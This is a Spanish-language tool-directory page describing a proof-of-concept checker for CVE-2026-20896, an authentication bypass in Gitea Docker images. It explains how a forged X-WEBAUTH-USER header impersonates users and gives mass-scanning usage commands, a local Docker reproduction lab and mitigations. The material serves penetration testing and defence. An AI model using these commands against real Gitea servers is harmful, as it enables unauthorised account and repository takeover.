Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2026-20896-gitea-poc — Comprobador de bypass de autenticación X-WEBAUTH-USER en Gitea Docker CVE-2026-20896 | Kitploit
Herramientas/GitHubGitHub/szybnev/cve-2026-20896-gitea-poc
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubszybnev/cve-2026-20896-gitea-poc

cve-2026-20896-gitea-poc

Comprobador de bypass de autenticación X-WEBAUTH-USER en Gitea Docker CVE-2026-20896

Ver Repositorio
10hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-20896 Comprobador de Omisión de Autenticación de Gitea Docker

Solo para operaciones autorizadas de red team / pentest.

Este repositorio contiene un comprobador mínimo para CVE-2026-20896, una omisión de autenticación en las imágenes oficiales de Gitea Docker hasta 1.26.2 inclusive cuando la autenticación mediante proxy inverso está habilitada.

Qué es CVE-2026-20896

Las imágenes afectadas de Gitea Docker incluían una plantilla app.ini con:

root@kitploit:~
REVERSE_PROXY_TRUSTED_PROXIES = *

Cuando un administrador habilitaba:

root@kitploit:~
ENABLE_REVERSE_PROXY_AUTHENTICATION = true

Gitea confiaba en X-WEBAUTH-USER desde cualquier IP de origen que pudiera alcanzar el puerto HTTP del contenedor directamente. Un cliente que eludiera el proxy inverso autenticador previsto podía enviar una única cabecera y suplantar a un usuario conocido o adivinable.

El impacto práctico es la suplantación de cuentas sin autenticación. Si el usuario adivinado es un administrador, el peor caso es la toma de control completa a nivel de aplicación de la instancia de Gitea y sus repositorios. El RCE del host depende del entorno y este comprobador no lo reivindica.

Las versiones parcheadas comienzan en 1.26.3; se recomienda actualizar a 1.26.4 o superior.

Cómo funciona el PoC

El comprobador:

  1. Obtiene la página de inicio del objetivo.
  2. Busca texto en el pie de página como Powered by Gitea Version: 1.26.4.
  3. Omite la prueba por defecto si la versión analizada es >= 1.26.3.
  4. Envía solicitudes GET / con X-WEBAUTH-USER: <username> para cada nombre de usuario proporcionado.
  5. Informa de un acierto cuando el título de la página devuelta parece el panel con sesión iniciada de ese usuario.

La versión en Go admite múltiples objetivos, archivos de nombres de usuario, concurrencia, tiempos de espera, salida JSONL, TLS --insecure, --dry-run y --force.

Compilación

root@kitploit:~
go build -o gitea-cve-2026-20896-check .

No se requieren dependencias Go de terceros.

Uso

Objetivo único:

root@kitploit:~
./gitea-cve-2026-20896-check \
  --url http://localhost:3000 \
  --users admin,gitea_admin,alice

Múltiples objetivos y nombres de usuario:

root@kitploit:~
./gitea-cve-2026-20896-check \
  --targets targets.txt \
  --user-file users.txt \
  --concurrency 64 \
  --timeout 8s \
  --jsonl

Prueba en seco:

root@kitploit:~
./gitea-cve-2026-20896-check \
  --url http://localhost:3000 \
  --users admin,alice \
  --dry-run

Alternativa en Bash:

root@kitploit:~
./poc.sh --url http://localhost:3000 --users admin,alice

Códigos de salida

  • 0: se confirmó al menos una suplantación vulnerable
  • 1: no se confirmó ninguna suplantación vulnerable
  • 2: error de uso, de entrada o en tiempo de ejecución

Laboratorio de reproducción local

El siguiente laboratorio inicia un contenedor local de Gitea afectado y crea un usuario de prueba:

root@kitploit:~
docker run -d --name gitea-cve-2026-20896 \
  -p 127.0.0.1:3000:3000 \
  -e GITEA__service__ENABLE_REVERSE_PROXY_AUTHENTICATION=true \
  -e GITEA__security__INSTALL_LOCK=true \
  gitea/gitea:1.26.2

sleep 15

docker exec --user git gitea-cve-2026-20896 gitea admin user create \
  --username alice \
  --password 'longpasswordhere1234' \
  --email [email protected] \
  --must-change-password=false

./gitea-cve-2026-20896-check --url http://localhost:3000 --users bob,alice,admin

Resultado positivo esperado:

root@kitploit:~
[VULNERABLE] http://localhost:3000 user=alice title="alice - Dashboard - Gitea: Git with a cup of tea"

Limpieza:

root@kitploit:~
docker rm -f gitea-cve-2026-20896

Mitigación

  • Actualizar Gitea a 1.26.3 o superior; se prefiere 1.26.4 o superior.
  • No exponer el puerto HTTP del contenedor Gitea backend directamente a redes no confiables.
  • Configurar explícitamente los proxies inversos de confianza.
  • Mantener la autenticación mediante proxy inverso deshabilitada a menos que se comprendan la ruta de red y el límite de confianza del proxy.

Referencias

  • Aviso de Gitea: https://github.com/go-gitea/gitea/security/advisories/GHSA-f75j-4cw6-rmx4
  • Notas de la versión de Gitea para 1.26.3 / 1.26.4: https://blog.gitea.com/release-of-1.26.3-and-1.26.4/
  • PR de corrección: https://github.com/go-gitea/gitea/pull/38151
  • Registro CVE: https://www.cve.org/CVERecord?id=CVE-2026-20896
  • Informe de sondeos in-the-wild mediante la telemetría de The Hacker News / Sysdig: https://thehackernews.com/2026/07/threat-actors-probe-gitea-docker-flaw.html
Descargar herramienta